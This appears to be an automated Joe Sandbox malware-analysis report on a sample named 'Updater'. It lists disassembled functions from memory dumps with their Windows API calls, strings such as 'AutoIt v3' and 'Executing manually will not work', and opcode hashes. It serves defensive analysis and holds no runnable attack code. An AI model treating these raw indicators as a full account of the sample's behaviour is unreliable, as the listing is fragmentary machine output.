Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$p3z$|(z
API String ID: 98802146-1549078497
Opcode ID: 4874865a02226c8d05a1c0cb973df24c48580c0a273bed1a3657b99e000ce412
Instruction ID: 37bf0b9c6ce4f42d10aa050c07316d3a7887068fd25b1cfd9d7467890be9718b
Opcode Fuzzy Hash: 4874865a02226c8d05a1c0cb973df24c48580c0a273bed1a3657b99e000ce412
Instruction Fuzzy Hash: C671A071909301AECB14EF65EC4186BBBE9FF8A740F40842EF545C72A0EB74DA48CB59

Function 006E507A Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006E50AD
RegisterClassExW.USER32(00000030), ref: 006E50D7
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006E50E8
InitCommonControlsEx.COMCTL32(?), ref: 006E5105
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006E5115
LoadIconW.USER32(000000A9), ref: 006E512B
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006E513A

Strings

AutoIt v3 GUI, xrefs: 006E50C9
TaskbarCreated, xrefs: 006E50DD
0, xrefs: 006E508F
+, xrefs: 006E5096

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1f8e513ddffc624e03ef8fa9177ccf455e39c12c3dcd68f4a293758fe94ac13e
Instruction ID: 59159dda0f373da838b374b13c95f6467da919f3b4366f143a12a916d1a95aa1
Opcode Fuzzy Hash: 1f8e513ddffc624e03ef8fa9177ccf455e39c12c3dcd68f4a293758fe94ac13e
Instruction Fuzzy Hash: 9C210BB1E15318EFDB10DF98EC88BDDBBB4FB09710F00811AF911A62A0D7B949459F99

Function 0149F141 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharNextA.USER32(00000000), ref: 0149F196
CharNextA.USER32(00000000,00000000), ref: 0149F1A2
CharNextA.USER32(00000000,00000000), ref: 0149F1CA
CharNextA.USER32(00000000), ref: 0149F1D6
CharNextA.USER32(?,00000000), ref: 0149F217
CharNextA.USER32(00000000,?,00000000), ref: 0149F223
CharNextA.USER32(00000000,?,00000000), ref: 0149F25B
CharNextA.USER32(?,00000000), ref: 0149F267

Strings

", xrefs: 0149F1BB
", xrefs: 0149F24C
, xrefs: 0149F169

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
Instruction ID: cc14cca4207827632179c4163ea9c81d33dd8077ad36dcc1cea7ee3af8e67680
Opcode Fuzzy Hash: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
Instruction Fuzzy Hash: 5851EDB4A042819FDB21DFACC484A56BFE5EF6A350B74089EE4D5CB361D735AC44CB90

Function 00710585 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007102C4: CreateFileW.KERNELBASE(00000000,00000000,?,0071062E,?,?,00000000,?,0071062E,00000000,0000000C), ref: 007102E1

GetLastError.KERNEL32 ref: 00710699
__dosmaperr.LIBCMT ref: 007106A0
GetFileType.KERNELBASE(00000000), ref: 007106AC
GetLastError.KERNEL32 ref: 007106B6
__dosmaperr.LIBCMT ref: 007106BF
CloseHandle.KERNEL32(00000000), ref: 007106DF
CloseHandle.KERNEL32(?), ref: 00710829
GetLastError.KERNEL32 ref: 0071085B
__dosmaperr.LIBCMT ref: 00710862

Strings

H, xrefs: 007107E7

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 51a014026c8db23bf8f066d944fbba8bf68e405181a49a987ab1fc6e731674d5
Instruction ID: 7e11d678847baefe1ad86a9d662cbf100e2b7d91835f373204fcdabb27a3ff93
Opcode Fuzzy Hash: 51a014026c8db23bf8f066d944fbba8bf68e405181a49a987ab1fc6e731674d5
Instruction Fuzzy Hash: 26A12432A14254DFDF19EF6CC855BEE3BE1AB46320F140149F8119B2D2DBB99C92CB91

Function 006E2C51 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 64
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006E2C5C
LoadCursorW.USER32(00000000,00007F00), ref: 006E2C6B
LoadIconW.USER32(00000063), ref: 006E2C81
LoadIconW.USER32(000000A4), ref: 006E2C93
LoadIconW.USER32(000000A2), ref: 006E2CA5
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006E2CBD
RegisterClassExW.USER32(?), ref: 006E2D0E

Part of subcall function 006E507A: GetSysColorBrush.USER32(0000000F), ref: 006E50AD
Part of subcall function 006E507A: RegisterClassExW.USER32(00000030), ref: 006E50D7
Part of subcall function 006E507A: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006E50E8
Part of subcall function 006E507A: InitCommonControlsEx.COMCTL32(?), ref: 006E5105
Part of subcall function 006E507A: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006E5115
Part of subcall function 006E507A: LoadIconW.USER32(000000A9), ref: 006E512B
Part of subcall function 006E507A: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006E513A

Strings

AutoIt v3, xrefs: 006E2CFD
#, xrefs: 006E2CE4
0, xrefs: 006E2CDD

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 7272235264c5691a55e6087e1eec5e3e8c5f14313bbb82ae0db308880ba23f44
Instruction ID: 81cc693961f0d8b2c3bf2e3f86c451fadd1c8bfb11df374efa39f72d22a6decf
Opcode Fuzzy Hash: 7272235264c5691a55e6087e1eec5e3e8c5f14313bbb82ae0db308880ba23f44
Instruction Fuzzy Hash: 9121FF70E11314AFDF109FA9EC45B99BFB5FB8A710F00802AF505A62A1D7BE0951CF99

Function 006D921A Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006EFA2C
Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006EFA34
Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006EFA3F
Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006EFA4A
Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000011,00000000), ref: 006EFA52
Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000012,00000000), ref: 006EFA5A

Part of subcall function 006EF508: RegisterWindowMessageW.USER32(00000004,?,006D93EB), ref: 006EF560

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006D9488
OleInitialize.OLE32 ref: 006D94A6
CloseHandle.KERNEL32(00000000,00000000), ref: 00718D75

Strings

%z, xrefs: 006D93B9
&z, xrefs: 006D93CF
x$z, xrefs: 006D9278
`(z, xrefs: 006D93F7
<%z, xrefs: 006D92B1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <%z$`(z$x$z$%z$&z
API String ID: 1986988660-2065116488
Opcode ID: 01e9702062aaeb2835f6dbbb43adad4bbc39a2704f7ec06ae0b772d4128454d6
Instruction ID: 614db80c20a72f1948a581570a5ddd8175e471b0048bb86664af1226ef8e5c27
Opcode Fuzzy Hash: 01e9702062aaeb2835f6dbbb43adad4bbc39a2704f7ec06ae0b772d4128454d6
Instruction Fuzzy Hash: 08716CB0D112408F8798EF7DA8696153AE1BBCB301310C6BAA409C7663EB7C49679F5D

Function 00708B75 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f6791c1126c29da583dfb47ca80bc49ad9805b2f7c29162d672022162b7538
Instruction ID: 136bb85f2d785067ceac1a99f8dade2248ca2580cfad3a8f48feede48e831c64
Opcode Fuzzy Hash: 61f6791c1126c29da583dfb47ca80bc49ad9805b2f7c29162d672022162b7538
Instruction Fuzzy Hash: 6FC1E471E04249EFDB519FA8C848BAE7BF0AF1A300F144285E590A73D2CB7C9941CB62

Function 014B9BD9 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A
MessageBoxA.USER32(00000000,no data,014B9E79,00000000), ref: 014B9CB2
GetTickCount.KERNEL32 ref: 014B9D4A

Strings

no data, xrefs: 014B9CAB
Executing manually will not work, xrefs: 014B9C33
nznddeJq, xrefs: 014B9C0A

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Message$CountTick
String ID: Executing manually will not work$no data$nznddeJq
API String ID: 1431039135-3900826401
Opcode ID: ba9ddbaba8c6f1da3b7920d470e1522cf7a8449f8c371189517d7bcf8584973f
Instruction ID: d6f0223c5079992ff1f59f43900527221c11c97a3bbc4b6ca1a20fafc72d6308
Opcode Fuzzy Hash: ba9ddbaba8c6f1da3b7920d470e1522cf7a8449f8c371189517d7bcf8584973f
Instruction Fuzzy Hash: A36107786452068FCB20EB66D4C0ECD77B5FB79324F61452AEA00973B8CB74AC06CB61

Function 006EFBB7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006EFBE5
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006EFC06
ShowWindow.USER32(00000000), ref: 006EFC1A
ShowWindow.USER32(00000000), ref: 006EFC23

Strings

AutoIt v3, xrefs: 006EFBDD, 006EFBE2, 006EFBE3
edit, xrefs: 006EFC00

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a95fb0200788cffb7c063cf292b34e4a6f14419cf2ded3bccb9cafcf8d9d3982
Instruction ID: 1ea16bb15e523dcbaae9d1257eabee88b1ec3c7cc2d1dbccbc7ac69715668ff1
Opcode Fuzzy Hash: a95fb0200788cffb7c063cf292b34e4a6f14419cf2ded3bccb9cafcf8d9d3982
Instruction Fuzzy Hash: 99F0DA71A403947AEE31171B6C48E376EBDD7CBF51B00806EF900A21B1D5AD0852DAB9

Function 014B297D Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,014B6DCD,00000001,00000000,00000000,00000000), ref: 014B2999
MessageBoxA.USER32(00000000,014B2AB5,014B2AB1,00000000), ref: 014B29B3
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,014B6DCD,00000001,00000000), ref: 014B29BB
ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 014B29DD
MessageBoxA.USER32(00000000,014B2AB9,014B2AB1,00000000), ref: 014B29F4
CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 014B2A9E

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$Message$CloseCreateHandleReadSize
String ID:
API String ID: 2324011479-0
Opcode ID: 259cfec4a4ca762d8f1a2513425256da8b184797b155471f1ea9b8ee91c1686b
Instruction ID: 875a87ba980d19f8e3df70c11e2a4a7f453044f458befe64511ed120378b4849
Opcode Fuzzy Hash: 259cfec4a4ca762d8f1a2513425256da8b184797b155471f1ea9b8ee91c1686b
Instruction Fuzzy Hash: A2318F74344301AFD310EF1ACC84F5AB7E5EFA8710F51892EF958973A1D6B0E8049B61

Function 006F0A12 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

___scrt_release_startup_lock.LIBCMT ref: 006F0AA4
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 006F0AB8
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 006F0ADD
___scrt_get_show_window_mode.LIBCMT ref: 006F0AEF
___scrt_uninitialize_crt.LIBCMT ref: 006F0B20
___scrt_fastfail.LIBCMT ref: 006F0B6F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt
String ID:
API String ID: 4079798206-0
Opcode ID: d0d25d3a03dfc3501c5e86c3462f82175848ca6728bfcd80a40e68c0012b959c
Instruction ID: 4df5a1ec4db4a7ea3a1c76287cc90ca247ac3bf9a2f46e3a3681b2722efbe449
Opcode Fuzzy Hash: d0d25d3a03dfc3501c5e86c3462f82175848ca6728bfcd80a40e68c0012b959c
Instruction Fuzzy Hash: 1121052168130DEAFA7077B898067BE23639F42725F24005DFB806B2D3CE664D41862D

Function 006E5C80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006E5C71,SwapMouseButtons,00000004,?), ref: 006E5CA4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006E5C71,SwapMouseButtons,00000004,?,?,?,?,006E4F9C), ref: 006E5CC5
RegCloseKey.KERNELBASE(00000000,?,?,006E5C71,SwapMouseButtons,00000004,?,?,?,?,006E4F9C), ref: 006E5CE7

Strings

Control Panel\Mouse, xrefs: 006E5CA2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a690d97c2a3bd7f3bf2a5bca23a6fe46486b34bb208ffd64b21c4700d586964c
Instruction ID: aaeb3e0fd88b56dba3eb0f3e39407d3acc3d4f6e3c9b1d495a1e81f0fb78dbc1
Opcode Fuzzy Hash: a690d97c2a3bd7f3bf2a5bca23a6fe46486b34bb208ffd64b21c4700d586964c
Instruction Fuzzy Hash: 21114871612748BEDB208FA9DC80AEEBBA9EF04B04F208469E806D7210E6319E419764

Function 006D7FF0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00717FA3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: cd15b3d40c0a4464915aa2edb063d1a0da74a0d51aea080ca13b4cbcbc22d617
Instruction ID: 0cf9397dac7b68a522e0b998125fdc99063b5813fce7a96f8396033fe4fb004a
Opcode Fuzzy Hash: cd15b3d40c0a4464915aa2edb063d1a0da74a0d51aea080ca13b4cbcbc22d617
Instruction Fuzzy Hash: CFC29D71E00205DFCB24CF98C884AADB7F2FF59710F25815AE905AB391DB35AD82CB95

Function 014B6625 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6665
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6674
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6693
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 014B6699

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: a47b8b5d0c43bd31b581e87a915d5a51e84b9558cf71df1ad3f7e02982d2e6aa
Instruction ID: 5276ecac3a2d2fb75a42ccb915f1f2169769256bc2eb8341b1b061508b263f5e
Opcode Fuzzy Hash: a47b8b5d0c43bd31b581e87a915d5a51e84b9558cf71df1ad3f7e02982d2e6aa
Instruction Fuzzy Hash: B6112174600205BFE710EF79CC82F9A77ECDB3C710F61056AB514E71E0EAB16A109624

Function 006D4293 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 463COMMON

Download Yara Rule

Strings

CALL, xrefs: 0071350E
|(z, xrefs: 0071351F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: CALL$|(z
API String ID: 0-1524859936
Opcode ID: 856a2218c9eecddf0a94a7852ca7f47e67ba24348ef0187f0c5e8fcce5e5223a
Instruction ID: 8e1434883ded9c5c6e90bc8c62e19ff86e6f6084e388e8bb40e8dc6b4ef82b3b
Opcode Fuzzy Hash: 856a2218c9eecddf0a94a7852ca7f47e67ba24348ef0187f0c5e8fcce5e5223a
Instruction Fuzzy Hash: AD128D70908341DFD724DF28C444B6AB7E2BF85300F15895EE99A8B3A1DB35ED85CB86

Function 006D8E00 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006D90D4

Strings

CALL, xrefs: 006D90A4
|(z, xrefs: 006D90B2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$|(z
API String ID: 1385522511-1524859936
Opcode ID: 0985149c4215118c27d09147d8743301cb3b4a02cb374adb2f72e57931c8eff4
Instruction ID: 9607b576738d30e88fb4a0822a02b20f40162d055f24a926969590cf279d0f0a
Opcode Fuzzy Hash: 0985149c4215118c27d09147d8743301cb3b4a02cb374adb2f72e57931c8eff4
Instruction Fuzzy Hash: 9F91ABB0908201DFCB24DF24C844B6ABBE2BF85314F14855DE99A4B3A2CB35E955CF96

Function 014B9B33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A

Strings

Executing manually will not work, xrefs: 014B9C33
nznddeJq, xrefs: 014B9C0A

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$nznddeJq
API String ID: 2030045667-2627449890
Opcode ID: 74c0ba8d6b0782ff0541851dff3686f365a5c199173a0dcb772eaa93b5bb265c
Instruction ID: 21b3cec66290254f5e3fab31de9be88d8b3d63d7e60a79021735d9d40f5d9cdb
Opcode Fuzzy Hash: 74c0ba8d6b0782ff0541851dff3686f365a5c199173a0dcb772eaa93b5bb265c
Instruction Fuzzy Hash: 7A310C306883098FCB54EFA0D8C0BD87774FB61228F95426FED044A175C23D984ADA31

Function 014B9BAF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A

Strings

Executing manually will not work, xrefs: 014B9C33
nznddeJq, xrefs: 014B9C0A

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$nznddeJq
API String ID: 2030045667-2627449890
Opcode ID: 73c1a51bc362858e621e64e5b4ea5b33f5890aabd3f75c2ec00891cc8cb15558
Instruction ID: cc1de87851e63d64be576edc72643715b390bd823f705e522a91d30394b7ef04
